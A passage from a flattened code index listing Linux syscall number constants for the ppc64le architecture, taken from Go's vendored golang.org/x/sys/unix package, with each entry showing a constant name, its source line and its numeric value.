SYS_RTAS = 255 constant SYS_SYS_DEBUG_SETCONTEXT (line 255) | SYS_SYS_DEBUG_SETCONTEXT = 256 constant SYS_MIGRATE_PAGES (line 256) | SYS_MIGRATE_PAGES = 258 constant SYS_MBIND (line 257) | SYS_MBIND = 259 constant SYS_GET_MEMPOLICY (line 258) | SYS_GET_MEMPOLICY = 260 constant SYS_SET_MEMPOLICY (line 259) | SYS_SET_MEMPOLICY = 261 constant SYS_MQ_OPEN (line 260) | SYS_MQ_OPEN = 262 constant SYS_MQ_UNLINK (line 261) | SYS_MQ_UNLINK = 263 constant SYS_MQ_TIMEDSEND (line 262) | SYS_MQ_TIMEDSEND = 264 constant SYS_MQ_TIMEDRECEIVE (line 263) | SYS_MQ_TIMEDRECEIVE = 265 constant SYS_MQ_NOTIFY (line 264) | SYS_MQ_NOTIFY = 266 constant SYS_MQ_GETSETATTR (line 265) | SYS_MQ_GETSETATTR = 267 constant SYS_KEXEC_LOAD (line 266) | SYS_KEXEC_LOAD = 268 constant SYS_ADD_KEY (line 267) | SYS_ADD_KEY = 269 constant SYS_REQUEST_KEY (line 268) | SYS_REQUEST_KEY = 270 constant SYS_KEYCTL (line 269) | SYS_KEYCTL = 271 constant SYS_WAITID (line 270) | SYS_WAITID = 272 constant SYS_IOPRIO_SET (line 271) | SYS_IOPRIO_SET = 273 constant SYS_IOPRIO_GET (line 272) | SYS_IOPRIO_GET = 274 constant SYS_INOTIFY_INIT (line 273) | SYS_INOTIFY_INIT = 275 constant SYS_INOTIFY_ADD_WATCH (line 274) | SYS_INOTIFY_ADD_WATCH = 276 constant SYS_INOTIFY_RM_WATCH (line 275) | SYS_INOTIFY_RM_WATCH = 277 constant SYS_SPU_RUN (line 276) | SYS_SPU_RUN = 278 constant SYS_SPU_CREATE (line 277) | SYS_SPU_CREATE = 279 constant SYS_PSELECT6 (line 278) | SYS_PSELECT6 = 280 constant SYS_PPOLL (line 279) | SYS_PPOLL = 281 constant SYS_UNSHARE (line 280) | SYS_UNSHARE = 282 constant SYS_SPLICE (line 281) | SYS_SPLICE = 283 constant SYS_TEE (line 282) | SYS_TEE = 284 constant SYS_VMSPLICE (line 283) | SYS_VMSPLICE = 285 constant SYS_OPENAT (line 284) | SYS_OPENAT = 286 constant SYS_MKDIRAT (line 285) | SYS_MKDIRAT = 287 constant SYS_MKNODAT (line 286) | SYS_MKNODAT = 288 constant SYS_FCHOWNAT (line 287) | SYS_FCHOWNAT = 289 constant SYS_FUTIMESAT (line 288) | SYS_FUTIMESAT = 290 constant SYS_NEWFSTATAT (line 289) | SYS_NEWFSTATAT = 291 constant SYS_UNLINKAT (line 290) | SYS_UNLINKAT = 292 constant SYS_RENAMEAT (line 291) | SYS_RENAMEAT = 293 constant SYS_LINKAT (line 292) | SYS_LINKAT = 294 constant SYS_SYMLINKAT (line 293) | SYS_SYMLINKAT = 295 constant SYS_READLINKAT (line 294) | SYS_READLINKAT = 296 constant SYS_FCHMODAT (line 295) | SYS_FCHMODAT = 297 constant SYS_FACCESSAT (line 296) | SYS_FACCESSAT = 298 constant SYS_GET_ROBUST_LIST (line 297) | SYS_GET_ROBUST_LIST = 299 constant SYS_SET_ROBUST_LIST (line 298) | SYS_SET_ROBUST_LIST = 300 constant SYS_MOVE_PAGES (line 299) | SYS_MOVE_PAGES = 301 constant SYS_GETCPU (line 300) | SYS_GETCPU = 302 constant SYS_EPOLL_PWAIT (line 301) | SYS_EPOLL_PWAIT = 303 constant SYS_UTIMENSAT (line 302) | SYS_UTIMENSAT = 304 constant SYS_SIGNALFD (line 303) | SYS_SIGNALFD = 305 constant SYS_TIMERFD_CREATE (line 304) | SYS_TIMERFD_CREATE = 306 constant SYS_EVENTFD (line 305) | SYS_EVENTFD = 307 constant SYS_SYNC_FILE_RANGE2 (line 306) | SYS_SYNC_FILE_RANGE2 = 308 constant SYS_FALLOCATE (line 307) | SYS_FALLOCATE = 309 constant SYS_SUBPAGE_PROT (line 308) | SYS_SUBPAGE_PROT = 310 constant SYS_TIMERFD_SETTIME (line 309) | SYS_TIMERFD_SETTIME = 311 constant SYS_TIMERFD_GETTIME (line 310) | SYS_TIMERFD_GETTIME = 312 constant SYS_SIGNALFD4 (line 311) | SYS_SIGNALFD4 = 313 constant SYS_EVENTFD2 (line 312) | SYS_EVENTFD2 = 314 constant SYS_EPOLL_CREATE1 (line 313) | SYS_EPOLL_CREATE1 = 315 constant SYS_DUP3 (line 314) | SYS_DUP3 = 316 constant SYS_PIPE2 (line 315) | SYS_PIPE2 = 317 constant SYS_INOTIFY_INIT1 (line 316) | SYS_INOTIFY_INIT1 = 318 constant SYS_PERF_EVENT_OPEN (line 317) | SYS_PERF_EVENT_OPEN = 319 constant SYS_PREADV (line 318) | SYS_PREADV = 320 constant SYS_PWRITEV (line 319) | SYS_PWRITEV = 321 constant SYS_RT_TGSIGQUEUEINFO (line 320) | SYS_RT_TGSIGQUEUEINFO = 322 constant SYS_FANOTIFY_INIT (line 321) | SYS_FANOTIFY_INIT = 323 constant SYS_FANOTIFY_MARK (line 322) | SYS_FANOTIFY_MARK = 324 constant SYS_PRLIMIT64 (line 323) | SYS_PRLIMIT64 = 325 constant SYS_SOCKET (line 324) | SYS_SOCKET = 326 constant SYS_BIND (line 325) | SYS_BIND = 327 constant SYS_CONNECT (line 326) | SYS_CONNECT = 328 constant SYS_LISTEN (line 327) | SYS_LISTEN = 329 constant SYS_ACCEPT (line 328) | SYS_ACCEPT = 330 constant SYS_GETSOCKNAME (line 329) | SYS_GETSOCKNAME = 331 constant SYS_GETPEERNAME (line 330) | SYS_GETPEERNAME = 332 constant SYS_SOCKETPAIR (line 331) | SYS_SOCKETPAIR = 333 constant SYS_SEND (line 332) | SYS_SEND = 334 constant SYS_SENDTO (line 333) | SYS_SENDTO = 335 constant SYS_RECV (line 334) | SYS_RECV = 336 constant SYS_RECVFROM (line 335) | SYS_RECVFROM = 337 constant SYS_SHUTDOWN (line 336) | SYS_SHUTDOWN = 338 constant SYS_SETSOCKOPT (line 337) | SYS_SETSOCKOPT = 339 constant SYS_GETSOCKOPT (line 338) | SYS_GETSOCKOPT = 340 constant SYS_SENDMSG (line 339) | SYS_SENDMSG = 341 constant SYS_RECVMSG (line 340) | SYS_RECVMSG = 342 constant SYS_RECVMMSG (line 341) | SYS_RECVMMSG = 343 constant SYS_ACCEPT4 (line 342) | SYS_ACCEPT4 = 344 constant SYS_NAME_TO_HANDLE_AT (line 343) | SYS_NAME_TO_HANDLE_AT = 345 constant SYS_OPEN_BY_HANDLE_AT (line 344) | SYS_OPEN_BY_HANDLE_AT = 346 constant SYS_CLOCK_ADJTIME (line 345) | SYS_CLOCK_ADJTIME = 347 constant SYS_SYNCFS (line 346) | SYS_SYNCFS = 348 constant SYS_SENDMMSG (line 347) | SYS_SENDMMSG = 349 constant SYS_SETNS (line 348) | SYS_SETNS = 350 constant SYS_PROCESS_VM_READV (line 349) | SYS_PROCESS_VM_READV = 351 constant SYS_PROCESS_VM_WRITEV (line 350) | SYS_PROCESS_VM_WRITEV = 352 constant SYS_FINIT_MODULE (line 351) | SYS_FINIT_MODULE = 353 constant SYS_KCMP (line 352) | SYS_KCMP = 354 constant SYS_SCHED_SETATTR (line 353) | SYS_SCHED_SETATTR = 355 constant SYS_SCHED_GETATTR (line 354) | SYS_SCHED_GETATTR = 356 constant SYS_RENAMEAT2 (line 355) | SYS_RENAMEAT2 = 357 constant SYS_SECCOMP (line 356) | SYS_SECCOMP = 358 constant SYS_GETRANDOM (line 357) | SYS_GETRANDOM = 359 constant SYS_MEMFD_CREATE (line 358) | SYS_MEMFD_CREATE = 360 constant SYS_BPF (line 359) | SYS_BPF = 361 constant SYS_EXECVEAT (line 360) | SYS_EXECVEAT = 362 constant SYS_SWITCH_ENDIAN (line 361) | SYS_SWITCH_ENDIAN = 363 constant SYS_USERFAULTFD (line 362) | SYS_USERFAULTFD = 364 constant SYS_MEMBARRIER (line 363) | SYS_MEMBARRIER = 365 constant SYS_MLOCK2 (line 364) | SYS_MLOCK2 = 378 constant SYS_COPY_FILE_RANGE (line 365) | SYS_COPY_FILE_RANGE = 379 constant SYS_PREADV2 (line 366) | SYS_PREADV2 = 380 constant SYS_PWRITEV2 (line 367) | SYS_PWRITEV2 = 381 constant SYS_KEXEC_FILE_LOAD (line 368) | SYS_KEXEC_FILE_LOAD = 382 constant SYS_STATX (line 369) | SYS_STATX = 383 constant SYS_PKEY_ALLOC (line 370) | SYS_PKEY_ALLOC = 384 constant SYS_PKEY_FREE (line 371) | SYS_PKEY_FREE = 385 constant SYS_PKEY_MPROTECT (line 372) | SYS_PKEY_MPROTECT = 386 constant SYS_RSEQ (line 373) | SYS_RSEQ = 387 constant SYS_IO_PGETEVENTS (line 374) | SYS_IO_PGETEVENTS = 388 constant SYS_SEMTIMEDOP (line 375) | SYS_SEMTIMEDOP = 392 constant SYS_SEMGET (line 376) | SYS_SEMGET = 393 constant SYS_SEMCTL (line 377) | SYS_SEMCTL = 394 constant SYS_SHMGET (line 378) | SYS_SHMGET = 395 constant SYS_SHMCTL (line 379) | SYS_SHMCTL = 396 constant SYS_SHMAT (line 380) | SYS_SHMAT = 397 constant SYS_SHMDT (line 381) | SYS_SHMDT = 398 constant SYS_MSGGET (line 382) | SYS_MSGGET = 399 constant SYS_MSGSND (line 383) | SYS_MSGSND = 400 constant SYS_MSGRCV (line 384) | SYS_MSGRCV = 401 constant SYS_MSGCTL (line 385) | SYS_MSGCTL = 402 constant SYS_PIDFD_SEND_SIGNAL (line 386) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 387) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 388) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 389) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 390) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 391) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 392) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 393) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 394) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 395) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 396) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 397) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 398) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 399) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 400) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 401) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 402) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 403) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 404) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 405) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 406) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 407) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 408) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_PROCESS_MRELEASE (line 409) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 410) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 411) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 412) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 413) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 414) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 415) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 416) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 417) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_ppc64le.go constant SYS_RESTART_SYSCALL (line 9) | SYS_RESTART_SYSCALL = 0 constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAITPID (line 16) | SYS_WAITPID = 7 constant SYS_CREAT (line 17) | SYS_CREAT = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_EXECVE (line 20) | SYS_EXECVE = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_TIME (line 22) | SYS_TIME = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_LCHOWN (line 25) | SYS_LCHOWN = 16 constant SYS_BREAK (line 26) | SYS_BREAK = 17 constant SYS_OLDSTAT (line 27) | SYS_OLDSTAT = 18 constant SYS_LSEEK (line 28) | SYS_LSEEK = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UMOUNT (line 31) | SYS_UMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_STIME (line 34) | SYS_STIME = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_ALARM (line 36) | SYS_ALARM = 27 constant SYS_OLDFSTAT (line 37) | SYS_OLDFSTAT = 28 constant SYS_PAUSE (line 38) | SYS_PAUSE = 29 constant SYS_UTIME (line 39) | SYS_UTIME = 30 constant SYS_STTY (line 40) | SYS_STTY = 31 constant SYS_GTTY (line 41) | SYS_GTTY = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_NICE (line 43) | SYS_NICE = 34 constant SYS_FTIME (line 44) | SYS_FTIME = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_KILL (line 46) | SYS_KILL = 37 constant SYS_RENAME (line 47) | SYS_RENAME = 38 constant SYS_MKDIR (line 48) | SYS_MKDIR = 39 constant SYS_RMDIR (line 49) | SYS_RMDIR = 40 constant SYS_DUP (line 50) | SYS_DUP = 41 constant SYS_PIPE (line 51) | SYS_PIPE = 42 constant SYS_TIMES (line 52) | SYS_TIMES = 43 constant SYS_PROF (line 53) | SYS_PROF = 44 constant SYS_BRK (line 54) | SYS_BRK = 45 constant SYS_SETGID (line 55) | SYS_SETGID = 46 constant SYS_GETGID (line 56) | SYS_GETGID = 47 constant SYS_SIGNAL (line 57) | SYS_SIGNAL = 48 constant SYS_GETEUID (line 58) | SYS_GETEUID = 49 constant SYS_GETEGID (line 59) | SYS_GETEGID = 50 constant SYS_ACCT (line 60) | SYS_ACCT = 51 constant SYS_UMOUNT2 (line 61) | SYS_UMOUNT2 = 52 constant SYS_LOCK (line 62) | SYS_LOCK = 53 constant SYS_IOCTL (line 63) | SYS_IOCTL = 54 constant SYS_FCNTL (line 64) | SYS_FCNTL = 55 constant SYS_MPX (line 65) | SYS_MPX = 56 constant SYS_SETPGID (line 66) | SYS_SETPGID = 57 constant SYS_ULIMIT (line 67) | SYS_ULIMIT = 58 constant SYS_OLDOLDUNAME (line 68) | SYS_OLDOLDUNAME = 59 constant SYS_UMASK (line 69) | SYS_UMASK = 60 constant SYS_CHROOT (line 70) | SYS_CHROOT = 61 constant SYS_USTAT (line 71) | SYS_USTAT = 62 constant SYS_DUP2 (line 72) | SYS_DUP2 = 63 constant SYS_GETPPID (line 73) | SYS_GETPPID = 64 constant SYS_GETPGRP (line 74) | SYS_GETPGRP = 65 constant SYS_SETSID (line 75) | SYS_SETSID = 66 constant SYS_SIGACTION (line 76) | SYS_SIGACTION = 67 constant SYS_SGETMASK (line 77) | SYS_SGETMASK = 68 constant SYS_SSETMASK (line 78) | SYS_SSETMASK = 69 constant SYS_SETREUID (line 79) | SYS_SETREUID = 70 constant SYS_SETREGID (line 80) | SYS_SETREGID = 71 constant SYS_SIGSUSPEND (line 81) | SYS_SIGSUSPEND = 72 constant SYS_SIGPENDING (line 82) | SYS_SIGPENDING = 73 constant SYS_SETHOSTNAME (line 83) | SYS_SETHOSTNAME = 74 constant SYS_SETRLIMIT (line 84) | SYS_SETRLIMIT = 75 constant SYS_GETRLIMIT (line 85) | SYS_GETRLIMIT = 76 constant SYS_GETRUSAGE (line 86) | SYS_GETRUSAGE = 77 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 78 constant SYS_SETTIMEOFDAY (line 88) | SYS_SETTIMEOFDAY = 79 constant SYS_GETGROUPS (line 89) | SYS_GETGROUPS = 80 constant SYS_SETGROUPS (line 90) | SYS_SETGROUPS = 81 constant SYS_SELECT (line 91) | SYS_SELECT = 82 constant SYS_SYMLINK (line 92) | SYS_SYMLINK = 83 constant SYS_OLDLSTAT (line 93) | SYS_OLDLSTAT = 84 constant SYS_READLINK (line 94) | SYS_READLINK = 85 constant SYS_USELIB (line 95) | SYS_USELIB = 86 constant SYS_SWAPON (line 96) | SYS_SWAPON = 87 constant SYS_REBOOT (line 97) | SYS_REBOOT = 88 constant SYS_READDIR (line 98) | SYS_READDIR = 89 constant SYS_MMAP (line 99) | SYS_MMAP = 90 constant SYS_MUNMAP (line 100) | SYS_MUNMAP = 91 constant SYS_TRUNCATE (line 101) | SYS_TRUNCATE = 92 constant SYS_FTRUNCATE (line 102) | SYS_FTRUNCATE = 93 constant SYS_FCHMOD (line 103) | SYS_FCHMOD = 94 constant SYS_FCHOWN (line 104) | SYS_FCHOWN = 95 constant SYS_GETPRIORITY (line 105) | SYS_GETPRIORITY = 96 constant SYS_SETPRIORITY (line 106) | SYS_SETPRIORITY = 97 constant SYS_PROFIL (line 107) | SYS_PROFIL = 98 constant SYS_STATFS (line 108) | SYS_STATFS = 99 constant SYS_FSTATFS (line 109) | SYS_FSTATFS = 100 constant SYS_IOPERM (line 110) | SYS_IOPERM = 101 constant SYS_SOCKETCALL (line 111) | SYS_SOCKETCALL = 102 constant SYS_SYSLOG (line 112) | SYS_SYSLOG = 103 constant SYS_SETITIMER (line 113) | SYS_SETITIMER = 104 constant SYS_GETITIMER (line 114) | SYS_GETITIMER = 105 constant SYS_STAT (line 115) | SYS_STAT = 106 constant SYS_LSTAT (line 116) | SYS_LSTAT = 107 constant SYS_FSTAT (line 117) | SYS_FSTAT = 108 constant SYS_OLDUNAME (line 118) | SYS_OLDUNAME = 109 constant SYS_IOPL (line 119) | SYS_IOPL = 110 constant SYS_VHANGUP (line 120) | SYS_VHANGUP = 111 constant SYS_IDLE (line 121) | SYS_IDLE = 112 constant SYS_VM86 (line 122) | SYS_VM86 = 113 constant SYS_WAIT4 (line 123) | SYS_WAIT4 = 114 constant SYS_SWAPOFF (line 124) | SYS_SWAPOFF = 115 constant SYS_SYSINFO (line 125) | SYS_SYSINFO = 116 constant SYS_IPC (line 126) | SYS_IPC = 117 constant SYS_FSYNC (line 127) | SYS_FSYNC = 118 constant SYS_SIGRETURN (line 128) | SYS_SIGRETURN = 119 constant SYS_CLONE (line 129) | SYS_CLONE = 120 constant SYS_SETDOMAINNAME (line 130) | SYS_SETDOMAINNAME = 121 constant SYS_UNAME (line 131) | SYS_UNAME = 122 constant SYS_MODIFY_LDT (line 132) | SYS_MODIFY_LDT = 123 constant SYS_ADJTIMEX (line 133) | SYS_ADJTIMEX = 124 constant SYS_MPROTECT (line 134) | SYS_MPROTECT = 125 constant SYS_SIGPROCMASK (line 135) | SYS_SIGPROCMASK = 126 constant SYS_CREATE_MODULE (line 136) | SYS_CREATE_MODULE = 127 constant SYS_INIT_MODULE (line 137) | SYS_INIT_MODULE = 128 constant SYS_DELETE_MODULE (line 138) | SYS_DELETE_MODULE = 129 constant SYS_GET_KERNEL_SYMS (line 139) | SYS_GET_KERNEL_SYMS = 130 constant SYS_QUOTACTL (line 140) | SYS_QUOTACTL = 131 constant SYS_GETPGID (line 141) | SYS_GETPGID = 132 constant SYS_FCHDIR (line 142) | SYS_FCHDIR = 133 constant SYS_BDFLUSH (line 143) | SYS_BDFLUSH = 134 constant SYS_SYSFS (line 144) | SYS_SYSFS = 135 constant SYS_PERSONALITY (line 145) | SYS_PERSONALITY = 136 constant SYS_AFS_SYSCALL (line 146) | SYS_AFS_SYSCALL = 137 constant SYS_SETFSUID (line 147) | SYS_SETFSUID = 138 constant SYS_SETFSGID (line 148) | SYS_SETFSGID = 139 constant SYS__LLSEEK (line 149) | SYS__LLSEEK = 140 constant SYS_GETDENTS (line 150) | SYS_GETDENTS = 141 constant SYS__NEWSELECT (line 151) | SYS__NEWSELECT = 142 constant SYS_FLOCK (line 152) | SYS_FLOCK = 143 constant SYS_MSYNC (line 153) | SYS_MSYNC = 144 constant SYS_READV (line 154) | SYS_READV = 145 constant SYS_WRITEV (line 155) | SYS_WRITEV = 146 constant SYS_GETSID (line 156) | SYS_GETSID = 147 constant SYS_FDATASYNC (line 157) | SYS_FDATASYNC = 148 constant SYS__SYSCTL (line 158) | SYS__SYSCTL = 149 constant SYS_MLOCK (line 159) | SYS_MLOCK = 150 constant SYS_MUNLOCK (line 160) | SYS_MUNLOCK = 151 constant SYS_MLOCKALL (line 161) | SYS_MLOCKALL = 152 constant SYS_MUNLOCKALL (line 162) | SYS_MUNLOCKALL = 153 constant SYS_SCHED_SETPARAM (line 163) | SYS_SCHED_SETPARAM = 154 constant SYS_SCHED_GETPARAM (line 164) | SYS_SCHED_GETPARAM = 155 constant SYS_SCHED_SETSCHEDULER (line 165) | SYS_SCHED_SETSCHEDULER = 156 constant SYS_SCHED_GETSCHEDULER (line 166) | SYS_SCHED_GETSCHEDULER = 157 constant SYS_SCHED_YIELD (line 167) | SYS_SCHED_YIELD = 158 constant SYS_SCHED_GET_PRIORITY_MAX (line 168) | SYS_SCHED_GET_PRIORITY_MAX = 159 constant SYS_SCHED_GET_PRIORITY_MIN (line 169) | SYS_SCHED_GET_PRIORITY_MIN = 160 constant SYS_SCHED_RR_GET_INTERVAL (line 170) | SYS_SCHED_RR_GET_INTERVAL = 161 constant SYS_NANOSLEEP (line 171) | SYS_NANOSLEEP = 162 constant SYS_MREMAP (line 172) | SYS_MREMAP = 163 constant SYS_SETRESUID (line 173) | SYS_SETRESUID = 164 constant SYS_GETRESUID (line 174) | SYS_GETRESUID = 165 constant SYS_QUERY_MODULE (line 175) | SYS_QUERY_MODULE = 166 constant SYS_POLL (line 176) | SYS_POLL = 167 constant SYS_NFSSERVCTL (line 177) | SYS_NFSSERVCTL = 168 constant SYS_SETRESGID (line 178) | SYS_SETRESGID = 169 constant SYS_GETRESGID (line 179) | SYS_GETRESGID = 170 constant SYS_PRCTL (line 180) | SYS_PRCTL = 171 constant SYS_RT_SIGRETURN (line 181) | SYS_RT_SIGRETURN = 172 constant SYS_RT_SIGACTION (line 182) | SYS_RT_SIGACTION = 173 constant SYS_RT_SIGPROCMASK (line 183) | SYS_RT_SIGPROCMASK = 174 constant SYS_RT_SIGPENDING (line 184) | SYS_RT_SIGPENDING = 175 constant SYS_RT_SIGTIMEDWAIT (line 185) | SYS_RT_SIGTIMEDWAIT = 176 constant SYS_RT_SIGQUEUEINFO (line 186) | SYS_RT_SIGQUEUEINFO = 177 constant SYS_RT_SIGSUSPEND (line 187) | SYS_RT_SIGSUSPEND = 178 constant SYS_PREAD64 (line 188) | SYS_PREAD64 = 179 constant SYS_PWRITE64 (line 189) | SYS_PWRITE64 = 180 constant SYS_CHOWN (line 190) | SYS_CHOWN = 181 constant SYS_GETCWD (line 191) | SYS_GETCWD = 182 constant SYS_CAPGET (line 192) | SYS_CAPGET = 183 constant SYS_CAPSET (line 193) | SYS_CAPSET = 184 constant SYS_SIGALTSTACK (line 194) | SYS_SIGALTSTACK = 185 constant SYS_SENDFILE (line 195) | SYS_SENDFILE = 186 constant SYS_GETPMSG (line 196) | SYS_GETPMSG = 187 constant SYS_PUTPMSG (line 197) | SYS_PUTPMSG = 188 constant SYS_VFORK (line 198) | SYS_VFORK = 189 constant SYS_UGETRLIMIT (line 199) | SYS_UGETRLIMIT = 190 constant SYS_READAHEAD (line 200) | SYS_READAHEAD = 191 constant SYS_PCICONFIG_READ (line 201) | SYS_PCICONFIG_READ = 198 constant SYS_PCICONFIG_WRITE (line 202) | SYS_PCICONFIG_WRITE = 199 constant SYS_PCICONFIG_IOBASE (line 203) | SYS_PCICONFIG_IOBASE = 200 constant SYS_MULTIPLEXER (line 204) | SYS_MULTIPLEXER = 201 constant SYS_GETDENTS64 (line 205) | SYS_GETDENTS64 = 202 constant SYS_PIVOT_ROOT (line 206) | SYS_PIVOT_ROOT = 203 constant SYS_MADVISE (line 207) | SYS_MADVISE = 205 constant SYS_MINCORE (line 208) | SYS_MINCORE = 206 constant SYS_GETTID (line 209) | SYS_GETTID = 207 constant SYS_TKILL (line 210) | SYS_TKILL = 208 constant SYS_SETXATTR (line 211) | SYS_SETXATTR = 209 constant SYS_LSETXATTR (line 212) | SYS_LSETXATTR = 210 constant SYS_FSETXATTR (line 213) | SYS_FSETXATTR = 211 constant SYS_GETXATTR (line 214) | SYS_GETXATTR = 212 constant SYS_LGETXATTR (line 215) | SYS_LGETXATTR = 213 constant SYS_FGETXATTR (line 216) | SYS_FGETXATTR = 214 constant SYS_LISTXATTR (line 217) | SYS_LISTXATTR = 215 constant SYS_LLISTXATTR (line 218) | SYS_LLISTXATTR = 216 constant SYS_FLISTXATTR (line 219) | SYS_FLISTXATTR = 217 constant SYS_REMOVEXATTR (line 220) | SYS_REMOVEXATTR = 218 constant SYS_LREMOVEXATTR (line 221) | SYS_LREMOVEXATTR = 219 constant SYS_FREMOVEXATTR (line 222) | SYS_FREMOVEXATTR = 220 constant SYS_FUTEX (line 223) | SYS_FUTEX = 221 constant SYS_SCHED_SETAFFINITY (line 224) | SYS_SCHED_SETAFFINITY = 222 constant SYS_SCHED_GETAFFINITY (line 225) | SYS_SCHED_GETAFFINITY = 223 constant SYS_TUXCALL (line 226) | SYS_TUXCALL = 225 constant SYS_IO_SETUP (line 227) | SYS_IO_SETUP = 227 constant SYS_IO_DESTROY (line 228) | SYS_IO_DESTROY = 228 constant SYS_IO_GETEVENTS (line 229) | SYS_IO_GETEVENTS = 229 constant SYS_IO_SUBMIT (line 230) | SYS_IO_SUBMIT = 230 constant SYS_IO_CANCEL (line 231) | SYS_IO_CANCEL = 231 constant SYS_SET_TID_ADDRESS (line 232) | SYS_SET_TID_ADDRESS = 232 constant SYS_FADVISE64 (line 233) | SYS_FADVISE64 = 233 constant SYS_EXIT_GROUP (line 234) | SYS_EXIT_GROUP = 234 constant SYS_LOOKUP_DCOOKIE (line 235) | SYS_LOOKUP_DCOOKIE = 235 constant SYS_EPOLL_CREATE (line 236) | SYS_EPOLL_CREATE = 236 constant SYS_EPOLL_CTL (line 237) | SYS_EPOLL_CTL = 237 constant SYS_EPOLL_WAIT (line 238) | SYS_EPOLL_WAIT = 238 constant SYS_REMAP_FILE_PAGES (line 239) | SYS_REMAP_FILE_PAGES = 239 constant SYS_TIMER_CREATE (line 240) | SYS_TIMER_CREATE = 240 constant SYS_TIMER_SETTIME (line 241) | SYS_TIMER_SETTIME = 241 constant SYS_TIMER_GETTIME (line 242) | SYS_TIMER_GETTIME = 242 constant SYS_TIMER_GETOVERRUN (line 243) | SYS_TIMER_GETOVERRUN = 243 constant SYS_TIMER_DELETE (line 244) | SYS_TIMER_DELETE = 244 constant SYS_CLOCK_SETTIME (line 245) | SYS_CLOCK_SETTIME = 245 constant SYS_CLOCK_GETTIME (line 246) | SYS_CLOCK_GETTIME = 246 constant SYS_CLOCK_GETRES (line 247) | SYS_CLOCK_GETRES = 247 constant SYS_CLOCK_NANOSLEEP (line 248) | SYS_CLOCK_NANOSLEEP = 248 constant SYS_SWAPCONTEXT (line 249) | SYS_SWAPCONTEXT = 249 constant SYS_TGKILL (line 250) | SYS_TGKILL = 250 constant SYS_UTIMES (line 251) | SYS_UTIMES = 251 constant SYS_STATFS64 (line 252) | SYS_STATFS64 = 252 constant SYS_FSTATFS64 (line 253) | SYS_FSTATFS64 = 253 constant SYS_RTAS (line 254) | SYS_RTAS = 255 constant SYS_SYS_DEBUG_SETCONTEXT (line 255) | SYS_SYS_DEBUG_SETCONTEXT = 256 constant SYS_MIGRATE_PAGES (line 256) | SYS_MIGRATE_PAGES = 258 constant SYS_MBIND (line 257) | SYS_MBIND = 259 constant SYS_GET_MEMPOLICY (line 258) | SYS_GET_MEMPOLICY = 260 constant SYS_SET_MEMPOLICY (line 259) | SYS_SET_MEMPOLICY = 261 constant SYS_MQ_OPEN (line 260) | SYS_MQ_OPEN = 262 constant SYS_MQ_UNLINK (line 261) | SYS_MQ_UNLINK = 263 constant SYS_MQ_TIMEDSEND (line 262) | SYS_MQ_TIMEDSEND = 264 constant SYS_MQ_TIMEDRECEIVE (line 263) | SYS_MQ_TIMEDRECEIVE = 265 constant SYS_MQ_NOTIFY (line 264) | SYS_MQ_NOTIFY = 266 constant SYS_MQ_GETSETATTR (line 265) | SYS_MQ_GETSETATTR = 267 constant SYS_KEXEC_LOAD (line 266) | SYS_KEXEC_LOAD = 268 constant SYS_ADD_KEY (line 267) | SYS_ADD_KEY = 269 constant SYS_REQUEST_KEY (line 268) | SYS_REQUEST_KEY = 270 constant SYS_KEYCTL (line 269) | 